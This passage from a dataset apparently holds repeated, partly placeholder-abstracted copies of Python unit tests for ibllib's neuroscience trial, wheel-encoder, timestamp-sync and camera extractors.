assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(np.delete(t0, 12), np.delete(t1, 24))\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n\n\nclass TestWheelLoaders(unittest.TestCase):\n\n def setUp(self) ->None:\n self.main_path = Path(__file__).parent\n\n def test_encoder_events_corrupt(self):\n path = self.main_path.joinpath('data', 'wheel', 'lt5')\n for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n dy = raw._load_encoder_events_file_lt5(file_events)\n self.assertTrue(dy.size > 6)\n path = self.main_path.joinpath('data', 'wheel', 'ge5')\n for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n dy = raw._load_encoder_events_file_ge5(file_events)\n self.assertTrue(dy.size > 6)\n\n def test_encoder_positions_corrupts(self):\n path = self.main_path.joinpath('data', 'wheel', 'ge5')\n for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n dy = raw._load_encoder_positions_file_ge5(file_position)\n self.assertTrue(dy.size > 18)\n path = self.main_path.joinpath('data', 'wheel', 'lt5')\n for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n dy = raw._load_encoder_positions_file_lt5(file_position)\n self.assertTrue(dy.size > 18)\n\n\nclass MockExtracor(BaseExtractor):\n save_names = ('some_file.csv', 'some_file.tsv', 'some_file.ssv',\n 'some_file.npy')\n var_names = 'csv', 'ssv', 'tsv', 'npy'\n\n def _extract(self, **kwargs) ->tuple:\n csv = pd.DataFrame([1, 2, 3])\n ssv = pd.DataFrame([1, 2, 3])\n tsv = pd.DataFrame([1, 2, 3])\n npy = np.array([1, 2, 3])\n return csv, ssv, tsv, npy\n\n\nclass TestBaseExtractorSavingMethods(unittest.TestCase):\n\n def setUp(self) ->None:\n self.tempdir = tempfile.TemporaryDirectory()\n self.session_path = self.tempdir.name\n self.mock_extractor = MockExtracor(self.session_path)\n\n def test_saving_method(self):\n data, paths = self.mock_extractor.extract(save=True)\n self.assertTrue(all([x.exists() for x in paths]))\n\n def tearDown(self):\n self.tempdir.cleanup()\n\n\nclass TestCameraExtractors(unittest.TestCase):\n\n def test_groom_pin_state(self):\n fps = 60\n t_offset = 39.4\n ts = np.arange(0, 10, 1 / fps) + t_offset\n ts += np.full_like(ts, 0.0001).cumsum()\n n_pulses = 2\n pulse_width = 0.3\n duty = 0.5\n gpio = {'indices': np.empty(n_pulses * 2, dtype=np.int32),\n 'polarities': np.ones(n_pulses * 2, dtype=np.int32)}\n gpio['polarities'][1::2] = -1\n aud_offset = 40.0\n audio = {'times': np.empty(n_pulses * 2), 'polarities': gpio[\n 'polarities']}\n for p in range(n_pulses):\n i = p * 2\n rise = pulse_width * p + duty * p + 1\n audio['times'][i] = aud_offset + rise\n audio['times'][i + 1] = audio['times'][i] + pulse_width\n rise += t_offset\n gpio['indices'][i] = np.where(ts > rise)[0][0]\n gpio['indices'][i + 1] = np.where(ts > rise + pulse_width)[0][0]\n gpio_, audio_, ts_ = camera.groom_pin_state(gpio, audio, ts)\n self.assertEqual(audio, audio_, \"Audio dict shouldn't be effected\")\n np.testing.assert_array_almost_equal(ts_[:4], [40.0, 40.016667, \n 40.033333, 40.05])\n delay = 0.08\n pulse_width = 1e-05\n t = audio['times'][0] + delay\n audio['times'] = np.sort(np.append(audio['times'], [t, t +\n pulse_width, 80]))\n audio['polarities'] = np.ones(audio['times'].shape, dtype=np.int32)\n audio['polarities'][1::2] = -1\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts, min_diff\n =0.005)\n self.assertTrue(audio_['times'].size == gpio_['times'].size == 4)\n audio['times'][4] -= 0.3\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts,\n tolerance=0.1, min_diff=0.005)\n self.assertTrue(np.all(gpio_['times'] == audio_['times']))\n self.assertTrue(np.all(gpio_['times'] == np.array([41.0, 41.3])))\n\n def test_attribute_times(self, display=False):\n tsa = np.linspace(0, 60, 60 * 4)[:60]\n tsb = np.linspace(0, 60, 60 * 3)[:45]\n tsa = np.sort(np.append(tsa, 0.4))\n tsb = np.sort(np.append(tsb, 0.41))\n if display:\n from ibllib.plots import vertical_lines\n import matplotlib.pyplot as plt\n vertical_lines(tsb, linestyle=':', color='r', label='tsb')\n vertical_lines(tsa, linestyle=':', color='b', label='tsa')\n plt.legend()\n matches = camera.attribute_times(tsa, tsb)\n expected = np.array([0, 1, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n self.assertEqual(matches.size, tsb.size)\n matches = camera.attribute_times(tsa, tsb, take='nearest')\n expected[np.r_[1:3]] = expected[1:3] + 1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, take='after')\n missing = [0, 4, 5, 7, 8, 10, 11, 13, 14, 16, 17, 19, 20, 22, 23, \n 25, 26, 28, 29, 31, 32, 34, 35, 37, 40, 43]\n expected[missing] = -1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, tol=0.05)\n expected = np.array([0, 2, 5, 9, 13, 17, 21, 25, 29, 33, 37, 41, 45,\n 49, 53, 57])\n np.testing.assert_array_equal(matches[matches > -1], expected)\n matches = camera.attribute_times(tsa, tsb, injective=False, take=\n 'nearest')\n expected = np.array([0, 2, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n with self.assertRaises(ValueError):\n camera.attribute_times(tsa, tsb, injective=False, take='closest')\n\n\n<code token>\n", "<import token>\n<function token>\n\n\nclass TestExtractTrialData(unittest.TestCase):\n\n def setUp(self):\n self.main_path = Path(__file__).parent\n self.training_lt5 = {'path': self.main_path / 'data' /\n 'session_training_lt5'}\n self.biased_lt5 = {'path': self.main_path / 'data' /\n 'session_biased_lt5'}\n self.training_ge5 = {'path': self.main_path / 'data' /\n 'session_training_ge5'}\n self.biased_ge5 = {'path': self.main_path / 'data' /\n 'session_biased_ge5'}\n self.training_lt5['ntrials'] = len(raw.load_data(self.training_lt5[\n 'path']))\n self.biased_lt5['ntrials'] = len(raw.load_data(self.biased_lt5['path'])\n )\n self.training_ge5['ntrials'] = len(raw.load_data(self.training_ge5[\n 'path']))\n self.biased_ge5['ntrials'] = len(raw.load_data(self.biased_ge5['path'])\n )\n self.wheel_ge5_path = self.main_path / 'data' / 'wheel_ge5'\n self.wheel_lt5_path = self.main_path / 'data' / 'wheel_lt5'\n <function token>\n\n def test_get_contrastLR(self):\n cl, cr = training_trials.ContrastLR(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n cl, cr = training_trials.ContrastLR(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n cl, cr = biased_trials.ContrastLR(self.biased_lt5['path']).extract()[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n cl, cr = biased_trials.ContrastLR(self.biased_ge5['path']).extract()[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n <function token>\n <function token>\n <function token>\n\n def test_get_rewardVolume(self):\n rv = training_trials.RewardVolume(self.training_lt5['path']).extract()[\n 0]\n self.assertTrue(isinstance(rv, np.ndarray))\n rv = training_trials.RewardVolume(self.training_ge5['path']).extract()[\n 0]\n self.assertTrue(isinstance(rv, np.ndarray))\n rv = biased_trials.RewardVolume(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(rv, np.ndarray))\n self.assertTrue(all([(x == max(rv)) for x in rv if x != 0]))\n rv = biased_trials.RewardVolume(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(rv, np.ndarray))\n self.assertTrue(all([(x == max(rv)) for x in rv if x != 0]))\n\n def test_get_feedback_times_ge5(self):\n ft = training_trials.FeedbackTimes(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n ft = biased_trials.FeedbackTimes(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n\n def test_get_feedback_times_lt5(self):\n ft = training_trials.FeedbackTimes(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n ft = biased_trials.FeedbackTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n\n def test_get_stimOnTrigger_times(self):\n sott = training_trials.StimOnTriggerTimes(self.training_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = training_trials.StimOnTriggerTimes(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = biased_trials.StimOnTriggerTimes(self.biased_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = biased_trials.StimOnTriggerTimes(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n <function token>\n\n def test_get_stimOn_times_ge5(self):\n st = training_trials.StimOnTimes_deprecated(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n st = biased_trials.StimOnTimes_deprecated(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n\n def test_stimOnOffFreeze_times(self):\n st = training_trials.StimOnOffFreezeTimes(self.training_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n st = biased_trials.StimOnOffFreezeTimes(self.biased_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n st = training_trials.StimOnOffFreezeTimes(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n st = biased_trials.StimOnOffFreezeTimes(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n <function token>\n\n def test_get_response_times(self):\n rt = training_trials.ResponseTimes(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = training_trials.ResponseTimes(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = biased_trials.ResponseTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = biased_trials.ResponseTimes(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n\n def test_get_goCueTrigger_times(self):\n data = raw.load_data(self.training_lt5['path'])\n gct = np.array([tr['behavior_data']['States timestamps'][\n 'closed_loop'][0][0] for tr in data])\n self.assertTrue(isinstance(gct, np.ndarray))\n gct = training_trials.GoCueTriggerTimes(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(gct, np.ndarray))\n data = raw.load_data(self.biased_lt5['path'])\n gct = np.array([tr['behavior_data']['States timestamps'][\n 'closed_loop'][0][0] for tr in data])\n self.assertTrue(isinstance(gct, np.ndarray))\n gct = biased_trials.GoCueTriggerTimes(self.biased_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(gct, np.ndarray))\n\n def test_get_goCueOnset_times(self):\n gcot = training_trials.GoCueTimes(self.training_lt5['path']).extract()[\n 0]\n self.assertTrue(isinstance(gcot, np.ndarray))\n self.assertTrue(np.all(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 4)\n gcot = training_trials.GoCueTimes(self.training_ge5['path']).extract()[\n 0]\n self.assertTrue(isinstance(gcot, np.ndarray))\n self.assertFalse(np.any(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 12)\n gcot = biased_trials.GoCueTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(gcot, np.ndarray))\n self.assertFalse(np.any(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 4)\n gcot = biased_trials.GoCueTimes(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(gcot, np.ndarray))\n self.assertFalse(np.any(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 8)\n\n def test_get_included_trials_lt5(self):\n it = training_trials.IncludedTrials(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(it, np.ndarray))\n it = biased_trials.IncludedTrials(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(it, np.ndarray))\n\n def test_get_included_trials_ge5(self):\n it = training_trials.IncludedTrials(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(it, np.ndarray))\n it = biased_trials.IncludedTrials(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(it, np.ndarray))\n <function token>\n\n @wheelMoves_fixture\n def test_extract_all(self):\n with self.assertRaises(ValueError) as ex:\n training_trials.extract_all(self.training_lt5['path'], settings\n ={'IBLRIG_VERSION_TAG': '4.9.9'}, save=True)\n self.assertIn('_ibl_wheelMoves.intervals.npy appears to be empty',\n str(ex.exception))\n out, files = training_trials.extract_all(self.training_ge5['path'],\n save=True)\n self.assertEqual(19, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n with unittest.mock.patch('ibllib.io.extractors.biased_trials.Wheel'\n ) as Wheel:\n Wheel.var_names = tuple()\n Wheel().extract.return_value = {}, []\n out, files = biased_trials.extract_all(self.biased_lt5['path'],\n settings={'IBLRIG_VERSION_TAG': '4.9.9'}, save=True)\n self.assertEqual(15, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n out, files = biased_trials.extract_all(self.biased_ge5['path'],\n save=True)\n self.assertEqual(19, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n\n def test_encoder_positions_clock_reset(self):\n path = self.training_lt5['path'] / 'raw_behavior_data'\n path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_lt5(path)\n dat = np.array([849736, 1532230, 1822449, 1833514, 1841566, 1848206,\n 1853979, 1859144])\n self.assertTrue(np.all(np.diff(dy['re_ts']) > 0))\n self.assertTrue(all(dy['re_ts'][6:] - 2 ** 32 - dat == 0))\n\n def test_encoder_positions_clock_errors(self):\n path = self.biased_lt5['path'] / 'raw_behavior_data'\n path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_lt5(path)\n self.assertTrue(np.all(np.diff(np.array(dy.re_ts)) > 0))\n path = self.biased_ge5['path'] / 'raw_behavior_data'\n path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_ge5(path)\n self.assertTrue(np.all(np.diff(np.array(dy.re_ts)) > 0))\n <function token>\n <function token>\n <function token>\n\n def test_size_outputs(self):\n from ibllib.io.extractors.bpod_trials import extract_all\n extract_all(self.training_ge5['path'])\n trials = alfio.load_object(self.training_ge5['path'] / 'alf',\n object='trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n extract_all(self.biased_ge5['path'])\n trials = alfio.load_object(self.biased_ge5['path'] / 'alf', object=\n 'trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n mock_data = {'intervals': np.array([[0, 1]]), 'peakAmplitude': np.\n array([1, 1]), 'peakVelocity_times': np.array([1, 1])}\n function_name = (\n 'ibllib.io.extractors.training_wheel.extract_wheel_moves')\n with unittest.mock.patch(function_name, return_value=mock_data):\n extract_all(self.training_lt5['path'])\n trials = alfio.load_object(self.training_lt5['path'] / 'alf',\n object='trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n with unittest.mock.patch(function_name, return_value=mock_data):\n extract_all(self.biased_lt5['path'])\n trials = alfio.load_object(self.biased_lt5['path'] / 'alf', object=\n 'trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n <function token>\n\n\nclass TestSyncWheelBpod(unittest.TestCase):\n\n def test_sync_bpod_bonsai_poor_quality_timestamps(self):\n sync_trials_robust = raw.sync_trials_robust\n drift_pol = np.array([11 * 1e-06, -20])\n np.random.seed(seed=784)\n t0_full = np.cumsum(np.random.rand(50)) + 0.001\n t1_full = np.polyval(drift_pol, t0_full) + t0_full\n t0 = t0_full.copy()\n t1 = t1_full.copy()\n t0_, t1_ = sync_trials_robust(t0, t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, t1[:-1])\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, t1[1:])\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0[1:], t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0[:-1], t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, np.delete(t1, 24))\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(np.delete(t0, 12), np.delete(t1, 24))\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n\n\nclass TestWheelLoaders(unittest.TestCase):\n\n def setUp(self) ->None:\n self.main_path = Path(__file__).parent\n\n def test_encoder_events_corrupt(self):\n path = self.main_path.joinpath('data', 'wheel', 'lt5')\n for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n dy = raw._load_encoder_events_file_lt5(file_events)\n self.assertTrue(dy.size > 6)\n path = self.main_path.joinpath('data', 'wheel', 'ge5')\n for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n dy = raw._load_encoder_events_file_ge5(file_events)\n self.assertTrue(dy.size > 6)\n\n def test_encoder_positions_corrupts(self):\n path = self.main_path.joinpath('data', 'wheel', 'ge5')\n for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n dy = raw._load_encoder_positions_file_ge5(file_position)\n self.assertTrue(dy.size > 18)\n path = self.main_path.joinpath('data', 'wheel', 'lt5')\n for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n dy = raw._load_encoder_positions_file_lt5(file_position)\n self.assertTrue(dy.size > 18)\n\n\nclass MockExtracor(BaseExtractor):\n save_names = ('some_file.csv', 'some_file.tsv', 'some_file.ssv',\n 'some_file.npy')\n var_names = 'csv', 'ssv', 'tsv', 'npy'\n\n def _extract(self, **kwargs) ->tuple:\n csv = pd.DataFrame([1, 2, 3])\n ssv = pd.DataFrame([1, 2, 3])\n tsv = pd.DataFrame([1, 2, 3])\n npy = np.array([1, 2, 3])\n return csv, ssv, tsv, npy\n\n\nclass TestBaseExtractorSavingMethods(unittest.TestCase):\n\n def setUp(self) ->None:\n self.tempdir = tempfile.TemporaryDirectory()\n self.session_path = self.tempdir.name\n self.mock_extractor = MockExtracor(self.session_path)\n\n def test_saving_method(self):\n data, paths = self.mock_extractor.extract(save=True)\n self.assertTrue(all([x.exists() for x in paths]))\n\n def tearDown(self):\n self.tempdir.cleanup()\n\n\nclass TestCameraExtractors(unittest.TestCase):\n\n def test_groom_pin_state(self):\n fps = 60\n t_offset = 39.4\n ts = np.arange(0, 10, 1 / fps) + t_offset\n ts += np.full_like(ts, 0.0001).cumsum()\n n_pulses = 2\n pulse_width = 0.3\n duty = 0.5\n gpio = {'indices': np.empty(n_pulses * 2, dtype=np.int32),\n 'polarities': np.ones(n_pulses * 2, dtype=np.int32)}\n gpio['polarities'][1::2] = -1\n aud_offset = 40.0\n audio = {'times': np.empty(n_pulses * 2), 'polarities': gpio[\n 'polarities']}\n for p in range(n_pulses):\n i = p * 2\n rise = pulse_width * p + duty * p + 1\n audio['times'][i] = aud_offset + rise\n audio['times'][i + 1] = audio['times'][i] + pulse_width\n rise += t_offset\n gpio['indices'][i] = np.where(ts > rise)[0][0]\n gpio['indices'][i + 1] = np.where(ts > rise + pulse_width)[0][0]\n gpio_, audio_, ts_ = camera.groom_pin_state(gpio, audio, ts)\n self.assertEqual(audio, audio_, \"Audio dict shouldn't be effected\")\n np.testing.assert_array_almost_equal(ts_[:4], [40.0, 40.016667, \n 40.033333, 40.05])\n delay = 0.08\n pulse_width = 1e-05\n t = audio['times'][0] + delay\n audio['times'] = np.sort(np.append(audio['times'], [t, t +\n pulse_width, 80]))\n audio['polarities'] = np.ones(audio['times'].shape, dtype=np.int32)\n audio['polarities'][1::2] = -1\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts, min_diff\n =0.005)\n self.assertTrue(audio_['times'].size == gpio_['times'].size == 4)\n audio['times'][4] -= 0.3\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts,\n tolerance=0.1, min_diff=0.005)\n self.assertTrue(np.all(gpio_['times'] == audio_['times']))\n self.assertTrue(np.all(gpio_['times'] == np.array([41.0, 41.3])))\n\n def test_attribute_times(self, display=False):\n tsa = np.linspace(0, 60, 60 * 4)[:60]\n tsb = np.linspace(0, 60, 60 * 3)[:45]\n tsa = np.sort(np.append(tsa, 0.4))\n tsb = np.sort(np.append(tsb, 0.41))\n if display:\n from ibllib.plots import vertical_lines\n import matplotlib.pyplot as plt\n vertical_lines(tsb, linestyle=':', color='r', label='tsb')\n vertical_lines(tsa, linestyle=':', color='b', label='tsa')\n plt.legend()\n matches = camera.attribute_times(tsa, tsb)\n expected = np.array([0, 1, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n self.assertEqual(matches.size, tsb.size)\n matches = camera.attribute_times(tsa, tsb, take='nearest')\n expected[np.r_[1:3]] = expected[1:3] + 1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, take='after')\n missing = [0, 4, 5, 7, 8, 10, 11, 13, 14, 16, 17, 19, 20, 22, 23, \n 25, 26, 28, 29, 31, 32, 34, 35, 37, 40, 43]\n expected[missing] = -1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, tol=0.05)\n expected = np.array([0, 2, 5, 9, 13, 17, 21, 25, 29, 33, 37, 41, 45,\n 49, 53, 57])\n np.testing.assert_array_equal(matches[matches > -1], expected)\n matches = camera.attribute_times(tsa, tsb, injective=False, take=\n 'nearest')\n expected = np.array([0, 2, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n with self.assertRaises(ValueError):\n camera.attribute_times(tsa, tsb, injective=False, take='closest')\n\n\n<code token>\n", "<import token>\n<function token>\n\n\nclass TestExtractTrialData(unittest.TestCase):\n\n def setUp(self):\n self.main_path = Path(__file__).parent\n self.training_lt5 = {'path': self.main_path / 'data' /\n 'session_training_lt5'}\n self.biased_lt5 = {'path': self.main_path / 'data' /\n 'session_biased_lt5'}\n self.training_ge5 = {'path': self.main_path / 'data' /\n 'session_training_ge5'}\n self.biased_ge5 = {'path': self.main_path / 'data' /\n 'session_biased_ge5'}\n self.training_lt5['ntrials'] = len(raw.load_data(self.training_lt5[\n 'path']))\n self.biased_lt5['ntrials'] = len(raw.load_data(self.biased_lt5['path'])\n )\n self.training_ge5['ntrials'] = len(raw.load_data(self.training_ge5[\n 'path']))\n self.biased_ge5['ntrials'] = len(raw.load_data(self.biased_ge5['path'])\n )\n self.wheel_ge5_path = self.main_path / 'data' / 'wheel_ge5'\n self.wheel_lt5_path = self.main_path / 'data' / 'wheel_lt5'\n <function token>\n\n def test_get_contrastLR(self):\n cl, cr = training_trials.ContrastLR(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n cl, cr = training_trials.ContrastLR(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n cl, cr = biased_trials.ContrastLR(self.biased_lt5['path']).extract()[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n cl, cr = biased_trials.ContrastLR(self.biased_ge5['path']).extract()[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n <function token>\n <function token>\n <function token>\n\n def test_get_rewardVolume(self):\n rv = training_trials.RewardVolume(self.training_lt5['path']).extract()[\n 0]\n self.assertTrue(isinstance(rv, np.ndarray))\n rv = training_trials.RewardVolume(self.training_ge5['path']).extract()[\n 0]\n self.assertTrue(isinstance(rv, np.ndarray))\n rv = biased_trials.RewardVolume(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(rv, np.ndarray))\n self.assertTrue(all([(x == max(rv)) for x in rv if x != 0]))\n rv = biased_trials.RewardVolume(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(rv, np.ndarray))\n self.assertTrue(all([(x == max(rv)) for x in rv if x != 0]))\n\n def test_get_feedback_times_ge5(self):\n ft = training_trials.FeedbackTimes(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n ft = biased_trials.FeedbackTimes(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n\n def test_get_feedback_times_lt5(self):\n ft = training_trials.FeedbackTimes(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n ft = biased_trials.FeedbackTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n\n def test_get_stimOnTrigger_times(self):\n sott = training_trials.StimOnTriggerTimes(self.training_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = training_trials.StimOnTriggerTimes(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = biased_trials.StimOnTriggerTimes(self.biased_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = biased_trials.StimOnTriggerTimes(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n <function token>\n\n def test_get_stimOn_times_ge5(self):\n st = training_trials.StimOnTimes_deprecated(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n st = biased_trials.StimOnTimes_deprecated(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n\n def test_stimOnOffFreeze_times(self):\n st = training_trials.StimOnOffFreezeTimes(self.training_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n st = biased_trials.StimOnOffFreezeTimes(self.biased_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n st = training_trials.StimOnOffFreezeTimes(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n st = biased_trials.StimOnOffFreezeTimes(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n <function token>\n\n def 